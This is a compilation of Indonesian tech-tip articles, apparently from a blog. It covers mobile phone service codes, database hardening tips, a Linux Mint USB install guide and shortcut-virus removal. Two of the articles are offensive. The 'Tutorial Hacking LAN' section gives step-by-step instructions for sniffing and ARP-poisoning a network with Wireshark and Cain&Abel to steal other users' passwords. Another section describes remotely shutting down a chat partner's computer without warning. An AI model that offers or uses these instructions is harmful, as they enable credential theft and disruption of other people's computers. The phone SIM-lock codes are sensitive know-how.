5. *#7693# Mengaktifkan/menonaktifkan Sleep Mode. Aktifkan saja untuk menghemat konsumsi baterai ketika ponsel sedang tidak dipakai.
6. *#8463*# Menampilkan beberapa informasi Sleep Mode: Wake, Sleep Req., Sleep.
7. *#2286*# Mengaktifkan data baterai.
8. *#7948*# Mematikan ponsel.
9. *#7728*# Menampilkan RSAV.
10. *#7524*# Menampilkan KCGPRS.
11. *#7562*# Menampilkan SIM Phase.
12. *#7629*# Menampilkan POOL MAX.
13. *#7632*# Menampilkan Code Bugging dari sleep mode.
14. *#7733*# Menampilkan Cluster aktif.
15. *#7343*# Menampilkan kode Cluster.
16. *#7352*# Menampilkan registrasi software.
17. *#7763*# Menampilkan informasi produk.
18. *#7766*# Menampilkan versi produk.
19. *#7326*# Menampilkan pilihan aksesoris untuk vibrator.
20. *#7276*# Mengaktifkan GPRS Attach.
21. *#7287*# Mengaktifkan GPRS Attached.
22. *#7288*# Mengaktifkan GPRS Try Attached.
23. *#7271*# Mengaktifkan GPRS Kelas 1
24. *#7274*# Mengaktifkan GPRS Kelas 4.
25. *#7252*# Mengaktifkan GPRS Kelas B.
26. *#7224*# Mengaktifkan GPRS Kelas C.
27. *#7222*# Mengaktifkan CSD GSM Kelas C.
28. *#7762*# Melakukan seting SMS bearer GPRS.
29. *#8377*# Menampilkan versi software.
30. *#3377*# Menampilkan kondisi EEPROMP.
31. *#2254# Status Register.
32. *#2255# Active/Deactive “Debug Call”, when activated, make a call to a busy line an the phone will display some hex-codes on the display.
33. *#2558# The time in days, hours, and minutes you are connected to the net..
34. *#7489*# atau *#1234*# Security Code.
35. *#7378*# Name, Length, SIM Phase.
36. *#3333*# Blocking list.

LG
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#07# Menampikan nomor IMEI dan versi software (LG 510).
3. *8375# Menampilkan versi software (LG B1200).
4. #PWR668 Test pabrikan (LG B1200).
5. 1945#5101# Simlock menu (LG B1200).
6. 2945#*5101# Simlock menu (LG 510W, 5200)
7. 2945#*70001# Simlock menu (LG 7020,7010)

Siemens
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#0000# Mengembalikan ke bahasa default.
3. **05*PUK*newPIN*newPIN# Deblock PIN using PUK.
4. **052*PUK2*newPIN2*newPIN2# Deblock PIN2 using PUK2.
5. **04*old_PIN*new_PIN*new_PIN# Mengubah PIN.
6. **042*old_PIN2*new_PIN2*new_PIN2# Mengubah PIN2.
7. *31# Menyembunyikan nama/nomor telepon pada ponsel penerima (CLIR).
8. #31# Menonaktifkan CLIR.
9. *#31# Mengecek status CLIR.
10. *30# Menampilkan nama/nomor telepon pada ponsel penerima (CLIP).
11. #30# Menonaktifkan CLIP.
12. *#30# Mengecek status CLIP.
13. *43# Mengaktifkan Call Waiting/Call Hold.
14. #43## Menonaktifkan Call Waiting.
15. *#43# Mengecek status Call Wating.
16. *#0001# lalu tekan tombol hijau (Call) Mengubah bahasa menggunakan kode. Angka 0001 adalah kode untuk bahasa inggris. Kode: 0030 (Yunani), 0031 (Belanda), 0032 (Perancis), 0034 (Spanyol), 0039 (Itali), 0049 (Jerman), 0090 (Turki).
17. *#0606# Shows if the phone is locked to any network (Use without SIM card).

BenQ-Siemens
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. *#0000# Mengembalikan ke bahasa default.
3. *#0001# lalu tekan tombol hijau (Call) Mengubah bahasa menggunakan kode. Angka 0001 adalah kode untuk bahasa inggris. Kode: 0030 (Yunani), 0031 (Belanda), 0032 (Perancis), 0034 (Spanyol), 0039 (Itali), 0049 (Jerman), 0090 (Turki)
4. *#9999# Mereset ke setingan awal (pabrikan).
5. *#300# Mengecek software.
6. *#301# Mengecek hardware.

Panasonic
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. **7370# Memformat ulang.


Alcatel
1. *#06# Menampilkan nomor IMEI (International Mobile Equipment Identity).
2. ###847# Reset full.
3. ###765*02# Memblokir panggilan masuk atau keluar (Add barring groups).
4. ###765*78# Menonaktifkan Barring groups.
5. ###765*05# Menonaktifkan/mengunci status network.
6. ###765*07# Mengaktifkan status network.
7. 000000* Net Monitor.

MENGAMANKAN DATABASE

Database dewasa ini berpasangan sangat erat dengan aplikasi-aplikasi web. Kegunaannya pun beragam, mulai dari menyimpan nama-nama user, password, hingga menyimpan no kartu kredit (ingat khan artikel yang Spyro posting mengenai tehnik carding dengan meng-crack file database).
Tapi sayangnya, keamanan database kerap kali diabaikan dan dianggap sebagai hal yang tidak terlalu membutuhkan perlindungan keamanan. Hal ini bisa disimpulkan dari sekian banyaknya artikel yang membahas tentang metode-metode srangan terhadap database. Padahal, kebocoran informasi-informasi yang ada pada database bisa berdampak fatal dan kerugian besar. Berikut ini beberapa cara untuk pencegahan serangan terhadap database anda:
1.      Rajin mengupdate Patch
Sesegera mungkin downloadlah dan instal patch-patch terbaru yang tersedia. Biasanya, baik untuk Microsoft ataupun Oracle, patch-patch diedarkan secara reguler. Namunjangan lupa untuk melakukan pengujian terlebih dahulu. Perlu diingat bahwa anda harus melakukan pengujian pada system mirror, jangan pada system yang sebenarnya.
2.      Konfigurasi Firewall
Terapkan aturan-aturan firewall yang ketat. Pastikan anda memeriksanya secara rutin dan berkala. Selalu blok port untuk akses-akses database seperti TCP dan UDP 1434 (MS SQL) dan TCP 1521-1530 (Oracle)
3.      Sanitasi (Penyaringan Input)
Anda harus mensanitasi input yang diterima dari user. Selalu periksa data-data yang diterima dan periksa tipenya (integer, string, dst..). Anda harus memotong karakter-karakter yang tidak diinginkan, misalnya saja meta karakter.
4.      Membuang Stored Procedure
Pastikan anda telah membuang semua stored procedure (termasuk extended stored procedure) dari keseluruhan database, tanpa terkecuali master. Script-script yang tidak berbahaya tersebut bisa saja menjadi penumbang database yang paling aman sekalipun.
5.      Penggunaan Stored Procedure
Jika memungkinkan, gunakan kode SQL yang sudah digunakan ke dalam sebuah stored procedure. Hal ini akan membatasi kode SQL yang perlu diatur dalam file ASP dan mengurangi exploitasi serangan terhadap validasi input.
6.      Enkripsi Session
Jika server database anda terpisah dari web server, pastikan anda mengenkripsi session dengan beberapa cara, misalnya saj menggunakan IPSec built in pada windows 2000.
7.      Hak-Hak Khusus
Pastikan (dan kalo bisa selalu) terapkan sesedikit mungkin hak-hak akses. Jangan menggunakan “sa” untuk mengakses file-file database.
Semoga artikel ini bermanfaat bagi anda!!!!

INSTALL DAN JALANKAN LINUX MINT 8 PORTABLE DI USB FLASHDISK

cma mau bagi2 ilmu, info, n pngalaman…
mungkin sudah banyak yang tau ada sudah coba tutorial ini,.
Bagi gw pribadi, make linux di usb sangat bermanfaat, kyak :
1. Free atawa gratis, ga perlu ribet ma aktivasi n kita gag make sofware bajakan.

2. Bisa untuk menyelamatkan file di Drive C [drive default system nya wind**s], misal ada file system yg korup ato terjangkit virus dan harus di install ulang… padahal banyak dokumen yang penting disana, jadi harus diselamatkan, kita bisa pake linux yg di booting dari usb, simple en hampir sebagian besar sudah di support oleh komputer zaman sekarang.
3. Bisa di pake untuk bersihin virus… (bagi yang sudah expert di bidang virus
4. Portable, bisa di bawa kemana2.
5. Gag perlu driver, slama gw pake di usb, dari LM 4, 5, 6, 7 dan terakhir 8, semua driver kompie terbaca, bisa LAN, Bluetooth, VGA, dll
6. Fitur dalam 1 distro lengkap, dari office smpe game, gag perlu install lagi.
7. dll dach..

cara untuk bisa install en jalanin distro ini di flashdisk:

Spoiler untuk yang di butuhkan:
1. Iso dari Linux Mint 8,pake yang Main Edition bisa di download dari situs resmi linux mint,
http://www.linuxmint.com/download.php ato Direct download Disini
kencang, support resume

2. Flasdisk buat media, min. 2 GB, format FAT32, beli sendiri yea

3. USB-Installer-For-Mint8.exe

4. Casper-RW-Creator.exe

Download file untuk format, usb installer, ma casper rw. 

Spoiler untuk petunjuk:
1. Tancepin Flasdisk nya ke kompie. 2. Format dolo, pake usbformat.exe dan pilih fat32.
3. Jalanin file USB-Installer-For-Mint8.exe, ikutin petunjuk nya, gag perlu diinstall kq file nya. Tunggu mpe selesai.
 4. Jalanin file Casper-RW-Creator.exe, ikutin lagi petunjuknya, ntar pilih size, klo flasdiskmu kapasitasnya 2Gb, pilih yang 1 GB, klo diatas itu terserah anda yang penting masih muat (untuk isonya aja 600an MB, + Casper RW, jadi sesuaikan aja ma kapasitas flasdisk mu). Tunggu lagi mpe selesai.

Kalo udah selesai, tinggal reboot pc kamu, n booting dari usb…
                            nih screenshot .. .. .



pake theme win 7, trus ge buka IDWS gag perlu install driver di kompie gw langsung konek lan, vga detek, efek compiz aktif

 screenshot untuk spoiler ke 2
ambah scrinsut, ne lagi pake theme win 7 yang udah hampir kumplit.. hehe… FF pake theme IE, buka thread ne… n ge di jalanin di tengktop upz… leptop Acer 4732z, driver detek smua, prtama x pake ne Leptop kalo udah.. selamat menikmati linux kamu, distro in bisa kamu setting, utak atik, dsb, karena setingan kamu akan tersimpan (persistance mode) jadi file kamu gag kan ilang kalo ngetik ato donlot dari linux. sebagian besar distro linux bisa di pake via usb, jadi tinggal pilih aja yang mana sesuai ama selera kamu. (berbeda untuk distro lainnya, tapi caranya hampir sama aja kq


untuk tema bisa di donlot disini [MF]:
Spoiler untuk Tema:
File berisi:
1. Cycron’s windows 7 theme.tar.gz
2. 101604-dockbarx_0.23.2.tar.gz
3. gnomenu-2.1.tar.gz
4. GnoMenu Theme
http://www.mediafire.com/download.php?imtzylyiyxy
Untuk penggunaan bisa googling


TUTORIAL HACKING LAN "KHUSUS NEWBIE"

Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html



Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

TRIK MATIKAN KOMPUTER ORANG SAAT CHATTING

Pernahkah anda mengalami rasa kesal terhadap lawan chatting anda,sehingga anda pengen mengerjainya?
Berikut ini saya tunjukkan cara mengerjai lawan chatting yang resek...trik ini juga dapat dilakukan untuk mengerjai sang penyusup yang mau nyuri data di komputer kita

Kita akan mematikan komputernya jarak jauh Tak perlu repot-repot menggunakan program remote kesayangan anda, gunakan saja bawaan windows.

Berikut langkah-langkahnya:
1. Buka Windows Command Processor anda. Klik Start -> Run lalu ketik: cmd
2. Pada command prompt, ketik: shutdown -i lalu tekan Enter.
3. Perintah tersebut akan memanggil kotak dialog Remote Shutdown. Perhatikan screenshoot berikut:

4. Klik tombol Add untuk memasukkan IP Address atau nama komputer target. Anda bisa memilih aksi, Shutdown, Log Off atau Restart. Pada kolom Display warning for anda bisa menentukan berapa lama countdown yang kan ditampilkan sebelum komputer di shutdown/log off/restart. Pada Opsi planned, ada pesan otomatis yang bisa anda pilih. Pada kolom Comment, anda bisa menuliskan pesan anda untuk sang penyusup. Entah ledekan atau.. terserah anda laah.. Saya rasa anda lebih jago soal ledek-meledek hehehe…
5. Klik OK sesudahnya. Kira-kira di komputer target akan muncul seperti ini:

Hohoho.. menyenangkan bukan?? Eh?? Kenapa?? Oh, anda adalah orang yang dijadikan target??
tidak ingin komputer yang anda pakai dimatikan dengan cara seperti diatas??
Tenang, saya ada sedikit tips..
1. Saat anda melihat kotak dialog peringatan bahwa komputer anda akan segera di shutdown, secepat mungkin bukalah Notepad atau aplikasi Microsoft Word. Ketik kata-kata sakti berikut: AKU INGIN HIDUP 1000 TAHUN LAGI!! Hehehe.. kelamaan yach?? emang harus kata-kata itu?? Ya nggak laah.. ketik apa aja dech, terserah anda, yang penting jangan biarkan kosong. Jangan menekan tombol Save!!
2. Saat “waktu eksekusi” menunjukkan angka 00:00:00, windows akan berusaha menutup aplikasi-aplikasi yang masih terbuka. Nah, aplikasi Notepad/Microsoft word yang anda buka tadi akan meminta konfirmasi dari anda apakah anda ingin menyimpan dokumen anda. Jangan pilih apa-apa, biarkan saja kotak dialog tu bertanya-tanya
3. Beberapa saat kemudian akan muncul kotak dialog End Program, klik tanda silang yang berada pada pojok kanan atas atau pilih cancel. Kotak dialog yang muncul berbeda-beda, kurang lebih demikian:

Nah, anda akan mendapati komputer anda tetap hidup, sehat walafiat dan berdiri tegak. hehehe..
Cuma itu caranya?? Ada nich yang lebih “formal” ^_^
1. Klik START -> Run
2. Secepat kilat, ketik shutdown -a
Perintah itu adalah perintah untuk melakukan Abort terhadap shutdown.
Lalu apa yang akan dilakukan sang Pemati Komputer?? Tentu kondisi ini tidak bisa didiamkan.Jangan biarkan sang target/Penyusup senyum-senyum sendiri. Andalah sebagai pemati komputer handal yang harus tersenyum Beri serangan kedua!! Jangan dulu pakai software remot favorit anda, nggak perlu ngeluarin senjata pamungkas untuk penyusup seperti ini. Ulangi langkah awal tadi, shutdown -i, namun jangan beri centang pada opsi Warn Users Of the action dan kosongi juga opsi Planned. Jangan beri pesan apa-apa dan komputer sang target/penyusup akan langsung shutdown tanpa konfirmasi
Sekian and Happy SHUTTING DOWN!!! ^_^

CARA MENGHILANGKAN VIRUS SHORTCUT

Beberapa hari yang lalu, teman saya ada yang mengeluhkan komputernya terkena virus yang tidak mempan diperbaiki menggunakan anti virus apapun. Setelah kontak teman-teman, ada yang menemukan solusi jitu terkait dengan virus ini. Sebut saja nama virusnya VIRUS SHORTCUT, karena virus tersebut membuat shortcut dari folder yang ada di hardisk. Namun shortcut tersebut jika dilihat property-nya akan mengarah pada link virus yang bersarang di windows/system32. Teman saya sudah berupaya mencari update berbagai macam anti virus termasuk yang selama ini kami gunakan yaitu PCMAV dan NOD32 terbaru untuk menghilangkan virus ini. Namun ternyata upaya tersebut tidak membuahkan hasil.
Dengan upaya keras mencari berbagai informasi dari internet, akhirnya ditemukan solusi untuk membasmi virus ini, meskipun dilakukan secara manual dan benar-benar menyita waktu karena setelah berhasil menghapus virus, proses selanjutnya adalah mencari (search) satu persatu shortcut tipuan tersebut dari harddisk dan kemudian menghapusnya secara manual pula.
Adapun Ciri – Ciri Virus Shortcut tersebut adalah:
Pertama-tama, setelah menginfeksi komputer, dia akan membuat file induk database.mdb di My Documents
Yang kedua adalah virus tersebut akan membuat file autorun.inf di setiap drive harddisk, flash disk, dan folder tanpa kecuali
Yang ketiga adalah dia akan membuat file Thumb.db (hati-hati, perhatikan bahwa file ini tanpa huruf s sedangkan thumbnail cache yang asli di komputer memiliki tambahan huruf s alias thumbs.db) di setiap folder
Untuk memancing korban, dia akan membuat file Microsoft.lnk dan New Harry Potter and….lnk di setiap folder yang jika dieksekusi akan langsung mengaktifkan virus tersebut.
Seperti halnya virus-virus lokal lainnya, dia akan membuat duplikat setiap folder namun kali ini bukan dengan ekstensi .exe melainkan extensi .ink alias shortcut.
Pada task manager terdapat proses services wscript.exe yang sedang berjalan. Dalam kondisi normal, tidak ada proses seperti ini.
Langkah – Langkah pembasmian:
1. Matikan System Restore. Sejak dulu saya selalu mematikan system restore segera setelah proses instalasi windows. Untuk keperluan backup dan imaging system, saya lebih memilih menggunakan third party seperti acronis ataupun Norton Ghost.
2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe)
Bisa menggunakan Process Explorer atau misc. tool pada HijackThis..
3. Hapus file virus database.mdb di My Documents..
4. Hapus file duplikat virus..
Untuk proses penghapusan, anda bisa menggunakan fasilitas search pada Windows.. Pada “More advanced options”, pastikan option “Search system folders” dan “Search hidden files and folders” keduanya telah dicentang.
Search file dengan nama autorun.inf ukurannya 8 KB
Search file dengan nama Thumb.db ukurannya 8 KB
Search file dengan ekstensi .lnk.lnk ukurannya 1 KB
Hapus semua file yang ditemukan..
Untuk lebih memudahkan proses pencarian yang sekaligus menghapus file yang ditemukan, anda bisa menggunakan software UTool, sebuah freeware yang dapat anda download secara gratis di SINI. Program ini akan secara otomatis mencari dan kemudian menghapus file-file yang diinginkan (lihat gambar).
utool
5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis..
Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb (pada gambar namun file database.mdb udah saya hapus)
regedit_run
Untuk lebih memantabkan proses pencegahan dan melindungi komputer kita dari serangan virus lokal yang sangat memusingkan ini, anda dapat melakukan hal-hal berikut:
1. Setelah proses instalasi windows, segera matikan system restore.
2. Install software third party misal Tweak UI atau Magic Tweak untuk mendisable autorun dan mencegah teraktivasinya file-file .inf. Mungkin pada Windows XP Professional, proses menon-aktifkan autorun bisa dilakukan dengan mudah, namun pada versi Win XP Home, anda memerlukan software ini. Tambahan informasi, program MagicTweak selain berfungsi menon-aktifkan autorn  dapat juga digunakan untuk mencegah dijalankannya file-file .inf File autorun.inf yang biasanya merupakan awal dari berjangkitnya virus akan secara otomatis diubah menjadi murni file txt alias notepad oleh program ini dan dia tidak lagi bisa dieksekusi. Ini sangat membantu jika memang secara tidak sengaja kita mengaktifkan atau mengeksekusi autorun.inf meski proses autorun sudah didisable untuk semua drive (termasuk flash disk).
3. Setelah semua proses instalasi windows, driver, program, dan lain-lain telah selesai, segera backup image system anda menggunakan software macam Acronis True Image atau Norton Ghost, sehingga jika nanti ada masalah yang tidak dapat anda selesaikan dengan mudah, anda dapat merestoreasi backup system tersebut.
4. Jika perlu, instal juga Deep Freeze apabila komputer anda digunakan oleh banyak orang, sehingga settingan komputer tidak akan berubah-ubah.
5. Update info: Ciri-ciri virus terdapatnya virus shortcut pada flashdisk dapat diketahui dengan perbedaan icon flashdisk tersebut yang biasanya berbentuk seperti icon drive menjadi berubah seperti icon folder. Jika menemui icon seperti ini, berarti dalam flashdisk tersebut terdapat virus. Gunakan explorer dan buka flashdisk lewat explorer (jangan klik 2x dari my computer) dan hapus file autorun dan file2 tersangka virus lainnya secara manual dengan menekan shift + DEL (supaya tidak tersangkut di recycle bin). Rata-rata virus lokal dapat dicegah dengan cara manual seperti ini asalkan OPSI DISABLE AUTORUN pada windows dan/atau MagicTweak telah diaktifkan, dan juga OPSI DISABLE .INF FILE pada MagicTweak telah diaktifkan (lihat gambar).
icon_flash

autorun_disable
Semoga informasi ini dapat membantu dan membuat kita lebih hati-hati jika menemui virus-virus lokal. Jangan sampai kita menjadi korban dan pekerjaan kita terbengkelai karena harus ngurusi virus.